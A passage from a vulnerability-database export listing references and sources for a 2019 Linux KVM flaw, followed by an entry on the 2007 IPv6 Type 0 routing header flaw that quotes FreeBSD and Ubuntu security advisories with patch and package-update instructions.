        "url": "https://www.exploit-db.com/exploits/46388/"
      },
      {
        "trust": 1.8,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cfa39381173d5f969daf43582c95ad679189cbc9"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00034.html"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2019/04/msg00004.html"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00002.html"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhba-2019:0959"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2019:0833"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/3930-1/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/3930-2/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/3931-1/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/3931-2/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/3932-1/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/3932-2/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/3933-2/"
      },
      {
        "trust": 1.5,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/changelog-4.14.99"
      },
      {
        "trust": 1.5,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/changelog-4.9.156"
      },
      {
        "trust": 1.5,
        "url": "https://github.com/torvalds/linux/commit/cfa39381173d5f969daf43582c95ad679189cbc9"
      },
      {
        "trust": 1.1,
        "url": "https://support.f5.com/csp/article/k11186236?utm_source=f5support\u0026amp%3butm_medium=rss"
      },
      {
        "trust": 1.0,
        "url": "https://www.exploit-db.com/exploits/46388"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/security/cve/cve-2019-6974"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-6974"
      },
      {
        "trust": 0.6,
        "url": "https://support.f5.com/csp/article/k11186236?utm_source=f5support\u0026utm_medium=rss"
      },
      {
        "trust": 0.6,
        "url": "https://github.com/torvalds/linux/commit/cfa39381173d5f969daf43582c95ad679189cbc9exploitpatchthird party advisory"
      },
      {
        "trust": 0.6,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/changelog-4.9.156vendor advisory"
      },
      {
        "trust": 0.6,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/changelog-4.20.8vendor advisory"
      },
      {
        "trust": 0.6,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/changelog-4.19.21vendor advisory"
      },
      {
        "trust": 0.6,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/changelog-4.14.99vendor advisory"
      },
      {
        "trust": 0.6,
        "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=1765exploitmailing listpatchthird party advisory"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20190683-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20190541-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0151/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/77542"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4349/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/155951/red-hat-security-advisory-2020-0103-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/76474"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/151690/linux-kvm/ioctl/create/device-reference-flow-failure.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-privilege-escalation-via-kvm-ioctl-create-device-28494"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/155466/red-hat-security-advisory-2019-3967-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4486/"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9213"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7222"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-19824"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7221"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cfa39381173d5f969daf43582c95ad679189cbc9"
      },
      {
        "trust": 0.3,
        "url": "https://www.oracle.com/technetwork/topics/security/linuxbulletinapr2019-5461367.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7308"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-8912"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-8980"
      },
      {
        "trust": 0.3,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3460"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9162"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-8956"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9003"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/usn/usn-3930-1"
      },
      {
        "trust": 0.1,
        "url": "https://support.f5.com/csp/article/k11186236?utm_source=f5support\u0026amp;amp;utm_medium=rss"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/362.html"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/416.html"
      },
      {
        "trust": 0.1,
        "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=59645"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/sec20-paper310/paper310"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/3.13.0-168.218"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3933-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18360"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-1000410"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.18.0-1008.9"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.18.0-1014.14"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.18.0-1012.14"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.18.0-17.18"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.18.0-1011.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.18.0-1009.9"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.18.0-1014.14~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3930-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.18.0-17.18~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-7221"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11599"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10853"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-10853"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-11599"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-18281"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20856"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-18281"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20856"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1041.45"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1029.31~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1035.37~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-47.50~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3931-2"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-18021"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14678"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1010.12~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3931-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1041.45~14.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5489"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13272"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13272"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-5489"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-158409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-6974"
      },
      {
        "db": "BID",
        "id": "107127"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-001392"
      },
      {
        "db": "PACKETSTORM",
        "id": "152379"
      },
      {
        "db": "PACKETSTORM",
        "id": "152369"
      },
      {
        "db": "PACKETSTORM",
        "id": "152370"
      },
      {
        "db": "PACKETSTORM",
        "id": "152598"
      },
      {
        "db": "PACKETSTORM",
        "id": "155951"
      },
      {
        "db": "PACKETSTORM",
        "id": "152374"
      },
      {
        "db": "PACKETSTORM",
        "id": "154553"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-612"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-6974"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-158409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-6974"
      },
      {
        "db": "BID",
        "id": "107127"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-001392"
      },
      {
        "db": "PACKETSTORM",
        "id": "152379"
      },
      {
        "db": "PACKETSTORM",
        "id": "152369"
      },
      {
        "db": "PACKETSTORM",
        "id": "152370"
      },
      {
        "db": "PACKETSTORM",
        "id": "152598"
      },
      {
        "db": "PACKETSTORM",
        "id": "155951"
      },
      {
        "db": "PACKETSTORM",
        "id": "152374"
      },
      {
        "db": "PACKETSTORM",
        "id": "154553"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-612"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-6974"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-02-15T00:00:00",
        "db": "VULHUB",
        "id": "VHN-158409"
      },
      {
        "date": "2019-02-15T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-6974"
      },
      {
        "date": "2019-02-15T00:00:00",
        "db": "BID",
        "id": "107127"
      },
      {
        "date": "2019-03-04T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-001392"
      },
      {
        "date": "2019-04-03T17:17:48",
        "db": "PACKETSTORM",
        "id": "152379"
      },
      {
        "date": "2019-04-03T17:11:08",
        "db": "PACKETSTORM",
        "id": "152369"
      },
      {
        "date": "2019-04-03T17:11:24",
        "db": "PACKETSTORM",
        "id": "152370"
      },
      {
        "date": "2019-04-23T16:28:55",
        "db": "PACKETSTORM",
        "id": "152598"
      },
      {
        "date": "2020-01-14T16:33:07",
        "db": "PACKETSTORM",
        "id": "155951"
      },
      {
        "date": "2019-04-03T17:14:13",
        "db": "PACKETSTORM",
        "id": "152374"
      },
      {
        "date": "2019-09-20T15:08:09",
        "db": "PACKETSTORM",
        "id": "154553"
      },
      {
        "date": "2019-02-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201902-612"
      },
      {
        "date": "2019-02-15T15:29:00.250000",
        "db": "NVD",
        "id": "CVE-2019-6974"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-10-15T00:00:00",
        "db": "VULHUB",
        "id": "VHN-158409"
      },
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-6974"
      },
      {
        "date": "2019-02-15T00:00:00",
        "db": "BID",
        "id": "107127"
      },
      {
        "date": "2019-03-04T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-001392"
      },
      {
        "date": "2022-04-06T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201902-612"
      },
      {
        "date": "2023-11-07T03:13:16.310000",
        "db": "NVD",
        "id": "CVE-2019-6974"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-612"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel Race condition vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-001392"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-612"
      }
    ],
    "trust": 0.6
  }
}

var-200704-0740
Vulnerability from variot

The IPv6 protocol allows remote attackers to cause a denial of service via crafted IPv6 type 0 route headers (IPV6_RTHDR_TYPE_0) that create network amplification between two routers. This vulnerability may allow an attacker to cause a denial-of-service condition. IPv6 Type 0 Routing header contains service disruption (DoS) There is a problem. IPv6 specification (RFC2460) So as an extension header Type 0 Specifies the routing header. this is IPv4 In loose source routing Is similar to IPv6 Nodes are required to process packets with this extension header. But using this feature DoS The possibility of attack is pointed out.Service operation interruption by a third party (DoS) An attack may be carried out. For example, it can be assumed that this attack consumes communication bandwidth. IPv6 protocol implementations are prone to a denial-of-service vulnerability due to a design error. This issue is related to the issue discussed in BID 22210 (Cisco IOS IPv6 Source Routing Remote Memory Corruption Vulnerability). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

============================================================================= FreeBSD-SA-07:03.ipv6 Security Advisory The FreeBSD Project

Topic: IPv6 Routing Header 0 is dangerous

Category: core Module: ipv6 Announced: 2007-04-26 Credits: Philippe Biondi, Arnaud Ebalard, Jun-ichiro itojun Hagino Affects: All FreeBSD releases. Corrected: 2007-04-24 11:42:42 UTC (RELENG_6, 6.2-STABLE) 2007-04-26 23:42:23 UTC (RELENG_6_2, 6.2-RELEASE-p4) 2007-04-26 23:41:59 UTC (RELENG_6_1, 6.1-RELEASE-p16) 2007-04-24 11:44:23 UTC (RELENG_5, 5.5-STABLE) 2007-04-26 23:41:27 UTC (RELENG_5_5, 5.5-RELEASE-p12) CVE Name: CVE-2007-2242

I.

II.

III.

An attacker can use vulnerable hosts to "concentrate" a denial of service attack against a victim host or network; that is, a set of packets sent over a period of 30 seconds or more could be constructed such that they all arrive at the victim within a period of 1 second or less.

Other attacks may also be possible.

IV. Workaround

No workaround is available.

V.

Perform one of the following:

1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the RELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 5.5, 6.1, and 6.2 systems.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

fetch http://security.FreeBSD.org/patches/SA-07:03/ipv6.patch

fetch http://security.FreeBSD.org/patches/SA-07:03/ipv6.patch.asc

b) Apply the patch.

cd /usr/src

patch < /path/to/patch

c) Recompile your kernel as described in and reboot the system.

VI. Correction details

The following list contains the revision numbers of each file that was corrected in FreeBSD.

Branch Revision Path


RELENG_5 src/sys/netinet6/in6.h 1.35.2.5 src/sys/netinet6/in6_proto.c 1.29.2.5 src/sys/netinet6/route6.c 1.10.4.2 RELENG_5_5 src/UPDATING 1.342.2.35.2.12 src/sys/conf/newvers.sh 1.62.2.21.2.14 src/sys/netinet6/in6.h 1.35.2.3.2.1 src/sys/netinet6/in6_proto.c 1.29.2.4.2.1 src/sys/netinet6/route6.c 1.10.4.1.4.1 RELENG_6 src/sys/netinet6/in6.h 1.36.2.8 src/sys/netinet6/in6_proto.c 1.32.2.6 src/sys/netinet6/route6.c 1.11.2.2 RELENG_6_2 src/UPDATING 1.416.2.29.2.7 src/sys/conf/newvers.sh 1.69.2.13.2.7 src/sys/netinet6/in6.h 1.36.2.7.2.1 src/sys/netinet6/in6_proto.c 1.32.2.5.2.1 src/sys/netinet6/route6.c 1.11.2.1.4.1 RELENG_6_1 src/UPDATING 1.416.2.22.2.18 src/sys/conf/newvers.sh 1.69.2.11.2.18 src/sys/netinet6/in6.h 1.36.2.6.2.1 src/sys/netinet6/in6_proto.c 1.32.2.4.2.1 src/sys/netinet6/route6.c 1.11.2.1.2.1


VII. References

http://www.secdev.org/conf/IPv6_RH_security-csw07.pdf

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2242

The latest revision of this advisory is available at http://security.FreeBSD.org/advisories/FreeBSD-SA-07:03.ipv6.asc -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (FreeBSD)

iD4DBQFGMTlvFdaIBMps37IRApu3AJYsifWIDLcyxNcMdnkvw4nBqXFoAJ43+IzB M5sIdCmLQABByFlbMB2BjQ== =OrNf -----END PGP SIGNATURE----- . =========================================================== Ubuntu Security Notice USN-486-1 July 17, 2007 linux-source-2.6.17 vulnerabilities CVE-2006-7203, CVE-2007-0005, CVE-2007-1000, CVE-2007-1353, CVE-2007-1861, CVE-2007-2242, CVE-2007-2453, CVE-2007-2525, CVE-2007-2875, CVE-2007-2876, CVE-2007-2878 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.10: linux-image-2.6.17-12-386 2.6.17.1-12.39 linux-image-2.6.17-12-generic 2.6.17.1-12.39 linux-image-2.6.17-12-hppa32 2.6.17.1-12.39 linux-image-2.6.17-12-hppa64 2.6.17.1-12.39 linux-image-2.6.17-12-itanium 2.6.17.1-12.39 linux-image-2.6.17-12-mckinley 2.6.17.1-12.39 linux-image-2.6.17-12-powerpc 2.6.17.1-12.39 linux-image-2.6.17-12-powerpc-smp 2.6.17.1-12.39 linux-image-2.6.17-12-powerpc64-smp 2.6.17.1-12.39 linux-image-2.6.17-12-server 2.6.17.1-12.39 linux-image-2.6.17-12-server-bigiron 2.6.17.1-12.39 linux-image-2.6.17-12-sparc64 2.6.17.1-12.39 linux-image-2.6.17-12-sparc64-smp 2.6.17.1-12.39

After a standard system upgrade you need to reboot your computer to effect the necessary changes.

ATTENTION: Due to an unavoidable ABI change the Ubuntu 6.10 kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (linux-386, linux-powerpc, linux-amd64-generic, etc), a standard system upgrade will automatically perform this as well.

Details follow:

The compat_sys_mount function allowed local users to cause a denial of service when mounting a smbfs filesystem in compatibility mode. (CVE-2006-7203)

The Omnikey CardMan 4040 driver (cm4040_cs) did not limit the size of buffers passed to read() and write(). A local attacker could exploit this to execute arbitrary code with kernel privileges. (CVE-2007-0005)

Due to a variable handling flaw in the ipv6_getsockopt_sticky() function a local attacker could exploit the getsockopt() calls to read arbitrary kernel memory. This could disclose sensitive data. (CVE-2007-1000)

Ilja van Sprundel discovered that Bluetooth setsockopt calls could leak kernel memory contents via an uninitialized stack buffer. A local attacker could exploit this flaw to view sensitive kernel information. (CVE-2007-1353)

A flaw was discovered in the handling of netlink messages. Local attackers could cause infinite recursion leading to a denial of service. (CVE-2007-2242)

The random number generator was hashing a subset of the available entropy, leading to slightly less random numbers. Additionally, systems without an entropy source would be seeded with the same inputs at boot time, leading to a repeatable series of random numbers. (CVE-2007-2453)

A flaw was discovered in the PPP over Ethernet implementation. Local attackers could manipulate ioctls and cause kernel memory consumption leading to a denial of service. (CVE-2007-2525)

An integer underflow was discovered in the cpuset filesystem. If mounted, local attackers could obtain kernel memory using large file offsets while reading the tasks file. This could disclose sensitive data. (CVE-2007-2875)

Vilmos Nebehaj discovered that the SCTP netfilter code did not correctly validate certain states. A remote attacker could send a specially crafted packet causing a denial of service. (CVE-2007-2876)

Luca Tettamanti discovered a flaw in the VFAT compat ioctls on 64-bit systems. A local attacker could corrupt a kernel_dirent struct and cause a denial of service. (CVE-2007-2878)

Updated packages for Ubuntu 6.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.39.diff.gz
  Size/MD5:  2086047 d07f76ec226f706d89a66e0ba3d34d44
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.39.dsc
  Size/MD5:     2321 af3e3fecf1d80a7aca131bde9a871966
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1.orig.tar.gz
  Size/MD5: 59339565 2e5451201e38e865cbc7b0717fa124a1

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-doc-2.6.17_2.6.17.1-12.39_all.deb
  Size/MD5:  4506664 f3307a7a1115f8a279a7ad52d09b251f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-kernel-devel_2.6.17.1-12.39_all.deb
  Size/MD5:  1097522 5d80796fb704894d1e083d7a4ea4dfa8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.39_all.deb
  Size/MD5: 46079376 a53f61537b12be4c1886f2578daad04d

amd64 architecture (Athlon64, Opteron, EM64T Xeon)

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    28612 0b1c6e3ab9284311bfb96e1dcb812fba
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    50502 074faf23893f63cef2aaae18f0bf1bc8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:     2450 56e11b173c9c8dad3a233777d1c412f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    40800 c3f23e9745643e33945c50afcd3d1a51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:   113554 98ace1d3b7e9409e5273daaa7b28495c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    44000 323e5cc16b63fd99d133539ddfa2e573
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    54026 2c1a7a6a9036ef0d9d16b82f78e56daa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:   189518 10a6605cfc28a6aefd355f1ef716d599
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    40036 41ffb86ffa5d8e12c82c857a1d960b77
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:   167756 fc36e453103ee9429469260e56697ac5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    60450 9672dfd9f1976cca1db9d9057027c025
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:   154560 94fa3f8b54017625b2856e0399450b36
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:   314682 64afdc80508ad9123b636165fe5ada0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:   105986 b9f5813e5daec7a7369e86273902a33e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:  1904480 b352f8bcf7f21620ef27b7ac745bd089
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.39_amd64.deb
  Size/MD5:   907094 ffde52fea07954ed03bbc4b151a634ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.39_amd64.deb
  Size/MD5:   913466 19b6851ea5c16833ac07e737d1637591
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.39_amd64.deb
  Size/MD5:  7429356 31cf4ff7a0b942b456abb41effb01e83
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.39_amd64.deb
  Size/MD5: 23872310 671651c6b5237c4b4f9ce0fd87322f81
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.39_amd64.deb
  Size/MD5: 24446348 54c63b9888616e3dc5181235faec4f7b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.39_amd64.deb
  Size/MD5:  2339902 6456d0226e101c5ca46568c0ac07dbc4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.39_amd64.deb
  Size/MD5:  2338992 4c5a331da5de8f7bd6e901f40d3065cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.39_amd64.deb
  Size/MD5:  1771236 c3dda7fd5856dedfadb6aeb86b1ee26b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    16792 f4e8db0d007fbf12243bfb4f73e11f54
